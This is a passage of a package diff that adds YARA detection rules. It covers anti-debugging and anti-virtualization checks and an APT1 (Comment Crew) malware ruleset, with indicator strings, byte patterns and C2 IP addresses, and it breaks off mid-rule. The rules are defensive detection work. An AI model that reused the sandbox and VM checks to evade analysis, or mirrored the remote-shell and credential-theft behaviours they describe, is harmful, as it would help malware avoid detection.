+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = "AddVectoredExceptionHandler"
+		$ = "RemoveVectoredExceptionHandler"
+	condition:
+		any of them
+}
+
+
+rule DebuggerPattern__RDTSC : AntiDebug DebuggerPattern {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = {0F 31}
+	condition:
+		any of them
+}
+
+rule DebuggerPattern__CPUID : AntiDebug DebuggerPattern {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = {0F A2}
+	condition:
+		any of them
+}
+
+rule DebuggerPattern__SEH_Saves : AntiDebug DebuggerPattern {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = {64 ff 35 00 00 00 00}
+	condition:
+		any of them
+}
+
+rule DebuggerPattern__SEH_Inits : AntiDebug DebuggerPattern {
+	meta:
+		weight = 1
+		Author = "naxonez"
+		reference = "https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara"
+	strings:
+		$ = {64 89 25 00 00 00 00}
+	condition:
+		any of them
+}
+
+
+rule Check_Dlls
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for common sandbox dlls"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$dll1 = "sbiedll.dll" wide nocase ascii fullword
+		$dll2 = "dbghelp.dll" wide nocase ascii fullword
+		$dll3 = "api_log.dll" wide nocase ascii fullword
+		$dll4 = "dir_watch.dll" wide nocase ascii fullword
+		$dll5 = "pstorec.dll" wide nocase ascii fullword
+		$dll6 = "vmcheck.dll" wide nocase ascii fullword
+		$dll7 = "wpespy.dll" wide nocase ascii fullword
+	condition:
+		2 of them
+}
+
+rule Check_Qemu_Description
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for QEMU systembiosversion key"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\Description\\System" nocase wide ascii
+		$value = "SystemBiosVersion" nocase wide ascii
+		$data = "QEMU" wide nocase ascii
+	condition:
+		all of them
+}
+
+rule Check_Qemu_DeviceMap
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for Qemu reg keys"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" nocase wide ascii
+		$value = "Identifier" nocase wide ascii
+		$data = "QEMU" wide nocase ascii
+	condition:
+		all of them
+}
+
+rule Check_VBox_Description
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks Vbox description reg key"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\Description\\System" nocase wide ascii
+		$value = "SystemBiosVersion" nocase wide ascii
+		$data = "VBOX" nocase wide ascii		
+	condition:
+		all of them
+}
+rule Check_VBox_DeviceMap
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks Vbox registry keys"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" nocase wide ascii
+		$value = "Identifier" nocase wide ascii
+		$data = "VBOX" nocase wide ascii
+	condition:
+		all of them
+}
+rule Check_VBox_Guest_Additions
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for the existence of the guest additions registry key"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "SOFTWARE\\Oracle\\VirtualBox Guest Additions" wide ascii nocase
+	condition:
+		any of them	
+}
+rule Check_VBox_VideoDrivers
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for reg keys of Vbox video drivers"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\Description\\System" nocase wide ascii
+		$value = "VideoBiosVersion" wide nocase ascii
+		$data = "VIRTUALBOX" nocase wide ascii
+	condition:
+		all of them
+}
+rule Check_VMWare_DeviceMap
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for the existence of VmWare Registry Keys"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$key = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0" wide ascii nocase
+		$value = "Identifier" wide nocase ascii
+		$data = "VMware" wide nocase ascii
+	condition:
+		all of them
+}
+rule Check_VmTools
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for the existence of VmTools reg key"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$ ="SOFTWARE\\VMware, Inc.\\VMware Tools" nocase ascii wide
+	condition:
+		any of them
+}
+rule Check_Wine
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for the existence of Wine"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$ ="wine_get_unix_file_name"
+	condition:
+		any of them
+}
+
+rule vmdetect
+{
+    meta:
+        author = "nex"
+        description = "Possibly employs anti-virtualization techniques"
+
+    strings:
+        // Binary tricks
+        $vmware = {56 4D 58 68}
+        $virtualpc = {0F 3F 07 0B}
+        $ssexy = {66 0F 70 ?? ?? 66 0F DB ?? ?? ?? ?? ?? 66 0F DB ?? ?? ?? ?? ?? 66 0F EF}
+        $vmcheckdll = {45 C7 00 01}
+        $redpill = {0F 01 0D 00 00 00 00 C3}
+
+        // Random strings
+        $vmware1 = "VMXh"
+        $vmware2 = "Ven_VMware_" nocase
+        $vmware3 = "Prod_VMware_Virtual_" nocase
+        $vmware4 = "hgfs.sys" nocase
+        $vmware5 = "mhgfs.sys" nocase
+        $vmware6 = "prleth.sys" nocase
+        $vmware7 = "prlfs.sys" nocase
+        $vmware8 = "prlmouse.sys" nocase
+        $vmware9 = "prlvideo.sys" nocase
+        $vmware10 = "prl_pv32.sys" nocase
+        $vmware11 = "vpc-s3.sys" nocase
+        $vmware12 = "vmsrvc.sys" nocase
+        $vmware13 = "vmx86.sys" nocase
+        $vmware14 = "vmnet.sys" nocase
+        $vmware15 = "vmicheartbeat" nocase
+        $vmware16 = "vmicvss" nocase
+        $vmware17 = "vmicshutdown" nocase
+        $vmware18 = "vmicexchange" nocase
+        $vmware19 = "vmdebug" nocase
+        $vmware20 = "vmmouse" nocase
+        $vmware21 = "vmtools" nocase
+        $vmware22 = "VMMEMCTL" nocase
+        $vmware23 = "vmx86" nocase
+        $vmware24 = "vmware" nocase
+        $virtualpc1 = "vpcbus" nocase
+        $virtualpc2 = "vpc-s3" nocase
+        $virtualpc3 = "vpcuhub" nocase
+        $virtualpc4 = "msvmmouf" nocase
+        $xen1 = "xenevtchn" nocase
+        $xen2 = "xennet" nocase
+        $xen3 = "xennet6" nocase
+        $xen4 = "xensvc" nocase
+        $xen5 = "xenvdb" nocase
+        $xen6 = "XenVMM" nocase
+        $virtualbox1 = "VBoxHook.dll" nocase
+        $virtualbox2 = "VBoxService" nocase
+        $virtualbox3 = "VBoxTray" nocase
+        $virtualbox4 = "VBoxMouse" nocase
+        $virtualbox5 = "VBoxGuest" nocase
+        $virtualbox6 = "VBoxSF" nocase
+        $virtualbox7 = "VBoxGuestAdditions" nocase
+        $virtualbox8 = "VBOX HARDDISK"  nocase
+
+        // MAC addresses
+        $vmware_mac_1a = "00-05-69"
+        $vmware_mac_1b = "00:05:69"
+        $vmware_mac_1c = "000569"
+        $vmware_mac_2a = "00-50-56"
+        $vmware_mac_2b = "00:50:56"
+        $vmware_mac_2c = "005056"
+        $vmware_mac_3a = "00-0C-29" nocase
+        $vmware_mac_3b = "00:0C:29" nocase
+        $vmware_mac_3c = "000C29" nocase
+        $vmware_mac_4a = "00-1C-14" nocase
+        $vmware_mac_4b = "00:1C:14" nocase
+        $vmware_mac_4c = "001C14" nocase
+        $virtualbox_mac_1a = "08-00-27"
+        $virtualbox_mac_1b = "08:00:27"
+        $virtualbox_mac_1c = "080027"
+
+    condition:
+        any of them
+}
+
+rule Check_Debugger
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Looks for both isDebuggerPresent and CheckRemoteDebuggerPresent"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	condition:
+		pe.imports("kernel32.dll","CheckRemoteDebuggerPresent") and 
+		pe.imports("kernel32.dll","IsDebuggerPresent")
+}
+
+rule Check_DriveSize
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Rule tries to catch uses of DeviceIOControl being used to get the drive size"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+
+	strings:
+		$physicaldrive = "\\\\.\\PhysicalDrive0" wide ascii nocase
+		$dwIoControlCode = {68 5c 40 07 00 [0-5] FF 15} //push 7405ch ; push esi (handle) then call deviceoiocontrol IOCTL_DISK_GET_LENGTH_INFO	
+	condition:
+		pe.imports("kernel32.dll","CreateFileA") and 	
+		pe.imports("kernel32.dll","DeviceIoControl") and 
+		$dwIoControlCode and
+		$physicaldrive
+}
+rule Check_FilePaths
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Checks for filepaths containing popular sandbox names"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings: 
+		$path1 = "SANDBOX" wide ascii
+		$path2 = "\\SAMPLE" wide ascii
+		$path3 = "\\VIRUS" wide ascii
+	condition:
+		all of ($path*) and pe.imports("kernel32.dll","GetModuleFileNameA")
+}
+
+rule Check_UserNames
+{
+	meta:
+		Author = "Nick Hoffman"
+		Description = "Looks for malware checking for common sandbox usernames"
+		Sample = "de1af0e97e94859d372be7fcf3a5daa5"
+	strings:
+		$user1 = "MALTEST" wide ascii
+		$user2 = "TEQUILABOOMBOOM" wide ascii
+		$user3 = "SANDBOX" wide ascii
+		$user4 = "VIRUS" wide ascii
+		$user5 = "MALWARE" wide ascii
+	condition:
+		all of ($user*)  and pe.imports("advapi32.dll","GetUserNameA")
+}
+
+
+rule Check_OutputDebugStringA_iat
+{
+
+	meta:
+		Author = "http://twitter.com/j0sm1"
+		Description = "Detect in IAT OutputDebugstringA"
+		Date = "20/04/2015"
+
+	condition:
+		pe.imports("kernel32.dll","OutputDebugStringA")
+}
+
+rule Check_unhandledExceptionFiler_iat {
+
+	meta:
+		Author = "http://twitter.com/j0sm1"
+		Description = "it's checked if UnhandledExceptionFilter is imported" 
+		Date = "20/04/2015"
+		Reference = "http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#UnhandledExceptionFilter"
+		
+	condition:
+		pe.imports("kernel32.dll","UnhandledExceptionFilter")	
+}
+
+rule check_RaiseException_iat {
+
+	meta:
+		Author = "http://twitter.com/j0sm1"
+		Description = "it's checked if RaiseException is imported" 
+		Date = "20/04/2015"
+		Reference = "http://waleedassar.blogspot.com.es/2012/11/ollydbg-raiseexception-bug.html"
+		
+	condition:
+		pe.imports("kernel32.dll","RaiseException")	
+}
+
+rule Check_FindWindowA_iat {
+
+	meta:
+		Author = "http://twitter.com/j0sm1"
+		Description = "it's checked if FindWindowA() is imported" 
+		Date = "20/04/2015"
+		Reference = "http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#OllyFindWindow"
+		
+	strings:
+		$ollydbg = "OLLYDBG"
+		$windbg = "WinDbgFrameClass"
+		
+	condition:
+		pe.imports("user32.dll","FindWindowA") and ($ollydbg or $windbg)
+}
+
+
diff -Nru remnux-rules-0.0.3/yara.old/APT1.yara remnux-rules-0.0.4/yara.old/APT1.yara
--- remnux-rules-0.0.3/yara.old/APT1.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/APT1.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,1172 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LIGHTDART_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "ret.log" wide ascii
+                $s2 = "Microsoft Internet Explorer 6.0" wide ascii
+                $s3 = "szURL Fail" wide ascii
+                $s4 = "szURL Successfully" wide ascii
+                $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii
+        condition:
+                all of them
+}
+
+rule AURIGA_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "superhard corp." wide ascii
+                $s2 = "microsoft corp." wide ascii
+                $s3 = "[Insert]" wide ascii
+                $s4 = "[Delete]" wide ascii
+                $s5 = "[End]" wide ascii
+                $s6 = "!(*@)(!@KEY" wide ascii
+                $s7 = "!(*@)(!@SID=" wide ascii
+        condition:
+                all of them
+}
+
+rule AURIGA_driver_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Services\\riodrv32" wide ascii
+                $s2 = "riodrv32.sys" wide ascii
+                $s3 = "svchost.exe" wide ascii
+                $s4 = "wuauserv.dll" wide ascii
+                $s5 = "arp.exe" wide ascii
+                $pdb = "projects\\auriga" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule BANGAT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "superhard corp." wide ascii
+                $s2 = "microsoft corp." wide ascii
+                $s3 = "[Insert]" wide ascii
+                $s4 = "[Delete]" wide ascii
+                $s5 = "[End]" wide ascii
+                $s6 = "!(*@)(!@KEY" wide ascii
+                $s7 = "!(*@)(!@SID=" wide ascii
+                $s8 = "end      binary output" wide ascii
+                $s9 = "XriteProcessMemory" wide ascii
+                $s10 = "IE:Password-Protected sites" wide ascii
+                $s11 = "pstorec.dll" wide ascii
+
+        condition:
+                all of them
+}
+
+rule BISCUIT_GREENCAT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "zxdosml" wide ascii
+                $s2 = "get user name error!" wide ascii
+                $s3 = "get computer name error!" wide ascii
+                $s4 = "----client system info----" wide ascii
+                $s5 = "stfile" wide ascii
+                $s6 = "cmd success!" wide ascii
+
+        condition:
+                all of them
+}
+
+rule BOUNCER_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii
+                $s2 = "IDR_DATA%d" wide ascii
+
+                $s3 = "asdfqwe123cxz" wide ascii
+                $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii
+
+        condition:
+                ($s1 and $s2) or ($s3 and $s4)
+
+}
+
+rule BOUNCER_DLL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "new_connection_to_bounce():" wide ascii
+                $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii
+
+        condition:
+                all of them
+}
+
+rule CALENDAR_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "content" wide ascii
+                $s2 = "title" wide ascii
+                $s3 = "entry" wide ascii
+                $s4 = "feed" wide ascii
+                $s5 = "DownRun success" wide ascii
+                $s6 = "%s@gmail.com" wide ascii
+                $s7 = "<!--%s-->" wide ascii
+
+                $b8 = "W4qKihsb+So=" wide ascii
+                $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii
+                $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii
+
+        condition:
+                all of ($s*) or all of ($b*)
+}
+
+rule COMBOS_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii
+                $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii
+                $s3 = "Delay" wide ascii
+                $s4 = "Getfile" wide ascii
+                $s5 = "Putfile" wide ascii
+                $s6 = "---[ Virtual Shell]---" wide ascii
+                $s7 = "Not Comming From Our Server %s." wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule DAIRY_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii
+                $s2 = "KilFail" wide ascii
+                $s3 = "KilSucc" wide ascii
+                $s4 = "pkkill" wide ascii
+                $s5 = "pklist" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule GLOOXMAIL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Kill process success!" wide ascii
+                $s2 = "Kill process failed!" wide ascii
+                $s3 = "Sleep success!" wide ascii
+                $s4 = "based on gloox" wide ascii
+
+                $pdb = "glooxtest.pdb" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule GOGGLES_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Kill process success!" wide ascii
+                $s2 = "Kill process failed!" wide ascii
+                $s3 = "Sleep success!" wide ascii
+                $s4 = "based on gloox" wide ascii
+
+                $pdb = "glooxtest.pdb" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule HACKSFASE1_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = {cb 39 82 49 42 be 1f 3a}
+
+        condition:
+                all of them
+}
+
+rule HACKSFASE2_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Send to Server failed." wide ascii
+                $s2 = "HandShake with the server failed. Error:" wide ascii
+                $s3 = "Decryption Failed. Context Expired." wide ascii
+
+        condition:
+                all of them
+}
+
+rule KURTON_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii
+                $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii
+                $s3 = "MyTmpFile.Dat" wide ascii
+                $s4 = "SvcHost.DLL.log" wide ascii
+
+        condition:
+                all of them
+}
+
+rule LONGRUN_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii
+                $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii
+                $s3 = "wait:" wide ascii
+                $s4 = "Dcryption Error! Invalid Character" wide ascii
+
+        condition:
+                all of them
+}
+
+rule MACROMAIL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "svcMsn.dll" wide ascii
+                $s2 = "RundllInstall" wide ascii
+                $s3 = "Config service %s ok." wide ascii
+                $s4 = "svchost.exe" wide ascii
+
+        condition:
+                all of them
+}
+
+rule MANITSME_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Install an Service hosted by SVCHOST." wide ascii
+                $s2 = "The Dll file that to be released." wide ascii
+                $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
+                $s4 = "svchost.exe" wide ascii
+
+                $e1 = "Man,it's me" wide ascii
+                $e2 = "Oh,shit" wide ascii
+                $e3 = "Hallelujah" wide ascii
+                $e4 = "nRet == SOCKET_ERROR" wide ascii
+
+                $pdb1 = "rouji\\release\\Install.pdb" wide ascii
+                $pdb2 = "rouji\\SvcMain.pdb" wide ascii
+
+        condition:
+                (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2
+}
+
+rule MINIASP_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "miniasp" wide ascii
+                $s2 = "wakeup=" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "command is null!" wide ascii
+                $s5 = "device_input.asp?device_t=" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule NEWSREELS_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii
+                $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "command is null!" wide ascii
+                $s5 = "noclient" wide ascii
+                $s6 = "wait" wide ascii
+                $s7 = "active" wide ascii
+                $s8 = "hello" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule SEASALT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii
+                $s2 = "upfileok" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "upfileer" wide ascii
+                $s5 = "fxftest" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule STARSYPOUND_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "*(SY)# cmd" wide ascii
+                $s2 = "send = %d" wide ascii
+                $s3 = "cmd.exe" wide ascii
+                $s4 = "*(SY)#" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule SWORD_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii
+                $s2 = "sleep:" wide ascii
+                $s3 = "down:" wide ascii
+                $s4 = "*========== Bye Bye ! ==========*" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule thequickbrow_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "thequickbrownfxjmpsvalzydg" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule TABMSGSQL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "letusgohtppmmv2.0.0.1" wide ascii
+                $s2 = "Mozilla/4.0 (compatible; )" wide ascii
+                $s3 = "filestoc" wide ascii
+                $s4 = "filectos" wide ascii
+                $s5 = "reshell" wide ascii
+
+        condition:
+                all of them
+}
+
+rule CCREWBACK1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "postvalue" wide ascii
+    $b = "postdata" wide ascii
+    $c = "postfile" wide ascii
+    $d = "hostname" wide ascii
+    $e = "clientkey" wide ascii
+    $f = "start Cmd Failure!" wide ascii
+    $g = "sleep:" wide ascii
+    $h = "downloadcopy:" wide ascii
+    $i = "download:" wide ascii
+    $j = "geturl:" wide ascii
+    $k = "1.234.1.68" wide ascii
+
+  condition:
+    4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k
+}
+
+rule TrojanCookies_CCREW
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "sleep:" wide ascii
+    $b = "content=" wide ascii
+    $c = "reqpath=" wide ascii
+    $d = "savepath=" wide ascii
+    $e = "command=" wide ascii
+
+
+  condition:
+    4 of ($a,$b,$c,$d,$e)
+}
+
+rule GEN_CCREW1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "W!r@o#n$g" wide ascii
+    $b = "KerNel32.dll" wide ascii
+
+  condition:
+    any of them
+}
+
+rule Elise
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "SetElise.pdb" wide ascii
+
+  condition:
+    $a
+}
+
+rule EclipseSunCloudRAT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "Eclipse_A" wide ascii
+    $b = "\\PJTS\\" wide ascii
+    $c = "Eclipse_Client_B.pdb" wide ascii
+    $d = "XiaoME" wide ascii
+    $e = "SunCloud-Code" wide ascii
+    $f = "/uc_server/data/forum.asp" wide ascii
+
+  condition:
+    any of them
+}
+
+rule MoonProject
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "Serverfile is smaller than Clientfile" wide ascii
+    $b = "\\M tools\\" wide ascii
+    $c = "MoonDLL" wide ascii
+        $d = "\\M tools\\" wide ascii
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42}
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader2
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "3gZFQOBtY3sifNOl" wide ascii
+        $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii
+        $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewMiniasp
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "MiniAsp.pdb" wide ascii
+    $b = "device_t=" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewSSLBack2
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = {39 82 49 42 BE 1F 3A}
+
+  condition:
+    any of them
+}
+
+rule ccrewSSLBack3
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "SLYHKAAY" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewSSLBack1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "!@#%$^#@!" wide ascii
+    $b = "64.91.80.6" wide ascii
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader3
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "ejlcmbv" wide ascii
+        $b = "bhxjuisv" wide ascii
+        $c = "yqzgrh" wide ascii
+        $d = "uqusofrp" wide ascii
+        $e = "Ljpltmivvdcbb" wide ascii
+        $f = "frfogjviirr" wide ascii
+        $g = "ximhttoskop" wide ascii
+  condition:
+    4 of them
+}
+
+
+rule ccrewQAZ
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "!QAZ@WSX" wide ascii
+
+  condition:
+    $a
+}
+
+rule metaxcd
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "<meta xcd=" wide ascii
+
+  condition:
+    $a
+}
+
+rule MiniASP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+strings:
+    $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }
+    $PDB = "MiniAsp.pdb" nocase wide ascii
+
+condition:
+    any of them
+}
+
+rule DownloaderPossibleCCrew
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "%s?%.6u" wide ascii
+    $b = "szFileUrl=%s" wide ascii
+    $c = "status=%u" wide ascii
+    $d = "down file success" wide ascii
+        $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii
+
+  condition:
+    all of them
+}
+
+rule APT1_MAPIGET
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $s1 = "%s\\Attachment.dat" wide ascii
+        $s2 = "MyOutlook" wide ascii
+        $s3 = "mail.txt" wide ascii
+        $s4 = "Recv Time:" wide ascii
+        $s5 = "Subject:" wide ascii
+
+    condition:
+        all of them
+}
+
+rule APT1_LIGHTBOLT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "bits.exe" wide ascii
+        $str2 = "PDFBROW" wide ascii
+        $str3 = "Browser.exe" wide ascii
+        $str4 = "Protect!" wide ascii
+    condition:
+        2 of them
+}
+
+rule APT1_GETMAIL
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $stra1 = "pls give the FULL path" wide ascii
+        $stra2 = "mapi32.dll" wide ascii
+        $stra3 = "doCompress" wide ascii
+
